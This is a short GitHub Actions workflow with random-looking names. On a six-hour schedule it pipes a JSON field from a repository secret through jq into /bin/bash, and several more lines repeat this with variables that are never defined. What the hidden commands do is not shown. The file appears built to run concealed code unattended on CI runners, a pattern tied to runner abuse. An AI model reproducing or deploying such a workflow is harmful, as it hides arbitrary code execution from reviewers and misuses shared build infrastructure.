name: tremblebusy

on:
  workflow_dispatch:
  schedule:
    - cron: '39 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tremblebusy
        env:
          ljp993: ${{ secrets.ljp993 }}
        run: |
          echo $ljp993 | jq -r .fsd70 | /bin/bash
          echo $ltxys33 | jq -r .shv2 | /bin/bash
          echo $kzc66631 | jq -r .qua258 | /bin/bash
          echo $ileo8 | jq -r .ofc96 | /bin/bash
          echo $zyq32 | jq -r .y3 | /bin/bash
          echo $sn7057 | jq -r .gmv16709 | /bin/bash
          echo $zmviq47610 | jq -r .ceg3078 | /bin/bash

